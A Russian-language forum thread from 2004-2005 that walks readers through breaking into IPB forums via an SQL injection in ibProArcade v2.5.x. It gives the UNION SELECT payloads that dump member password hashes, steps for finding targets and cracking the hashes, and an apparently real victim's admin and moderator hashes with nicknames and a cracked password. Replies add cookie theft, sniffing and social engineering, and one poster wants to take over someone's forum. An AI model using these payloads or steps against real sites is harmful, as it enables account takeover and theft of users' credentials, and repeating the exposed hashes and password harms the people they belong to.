| Хак! Ломать не строить - это уметь надо |
Ломаем ibProArcade v2.5.x, аля IPB X.X
,sql injection
Дата публикации:
PRYANIK, 1.12.2004 - 22:22
Ломаем ibProArcade v2.5.x, получаем доступ к IPB форуму X.X
• 1) Поисковичком шарим в инете на наличие нашего объекта внимания
• 2) Браузером отсылаем такой запрос на его сайт
Если форум на движке ipb 1.x
Цитата | Quote
адресс/index.php?act=Arcade&cat=
-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,
0,0,0,0,0,0,0%20FROM%20ibf_members/*
-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,
0,0,0,0,0,0,0%20FROM%20ibf_members/*
для IPB 2.x
Цитата | Quote
адресс/index.php?act=Arcade&cat=
-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,
0,0,0,0,0,0%20FROM%20ibf_members/*
-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,
0,0,0,0,0,0%20FROM%20ibf_members/*
Примерчик:
http://www.opresident...0ibf_members/*
• 3) Получаем инфу о всякой "полезной лабуде", а вместе с инфой и все пароли пользователей в хэше...
Пример, всё из того же форума
Начало списка хэша, левый столбец
d224e41e79b73a53dcfa86101256c851 ----пароль админа Ник: Ciccio
99f4b99d10c4d7aa96a5cb18477c70a7 ---пароль СуперМодера Ник: BlackyB
• 4) Качаем эту прожку _http://www.insidepro....sswordspro.zip
• 5) Вбиваем в неё хэшь админа или супра (Из примера, он будет такой, Супра:
Code
99f4b99d10c4d7aa96a5cb18477c70a7
) • 6) Перебираем...
• 7) Получаем пароль СуперМодера (из примера)
Ник: Нам уже известен BlackyB
Пароль: 270774
• 8) Вводим эти данные, наслаждаймся от части своим форумом...для полного прихватизирования, Вам надо расшифровать пасс админа, а мне было в лом это делать
Salavat, 4.12.2004 - 17:02
А мне сказали как пофиксить
vit_alll, 8.03.2005 - 21:24
И как пофиксить?SPiRiT, 8.03.2005 - 22:06
че-то я не понял откуда хеш видеть и вставлять?!PRYANIK, 9.03.2005 - 10:27
vit_alll, отключить категорииspark, после того как введёшь правильно ссылку, то всё сразу станет понятно...
P.S Сайт-пример уже не работает, ищите новый
...
SPiRiT, 9.03.2005 - 11:36
ну зашел, отобразилась обычная аркада и все!PRYANIK, 9.03.2005 - 12:00
значит на форуме уже пофиксили...ищи другой.Баг сам по себе уже старый, многие о нём знают и приняли меры...
Сделано в СССР, 10.08.2005 - 14:42
Интересно, а здесь кто-нть ломал уже IPB форумы?Мне интересно на одном форуме получить пароли админа и модеров. Просто немножко проучить хотелось людей, крушить им не хочу ничё... Версия 1.3.1 final. Кто знает как?
SPiRiT, 10.08.2005 - 15:05
Попробуй эксплойтом воспользоваться, который лежит в форуме про сетевую безопасность, а если уже дырку закрыли, применяй соц инженерию и сниффер, так ты сможешь похитеть куки, которые можно расшифровать (в 2.хх расшифровать нельзя)Сделано в СССР, 10.08.2005 - 15:24
QUOTE(=SPiRiT= @ 10.08.2005 - 15:05)
Попробуй эксплойтом воспользоваться, который лежит в форуме про сетевую безопасность, а если уже дырку закрыли, применяй соц инженерию и сниффер, так ты сможешь похитеть куки, которые можно расшифровать (в 2.хх расшифровать нельзя)
У-у, блин эт сложновато для меня - эт все изучать нада... я ни разу эти дела в глаза не видел и с чем едят не знаю...
Ладно - забыли...
deffer, 19.09.2005 - 18:55
я чего-то не понял а где вбивать то данные тоесть этот код который получился ?PRYANIK, 19.09.2005 - 19:23
QUOTE(deffer @ 19.09.2005 - 19:55)
а где вбивать то данные тоесть этот код который получился ?
В кукисы или в прогу: _http://www.insidepro....sswordspro.zip , для расшифровки...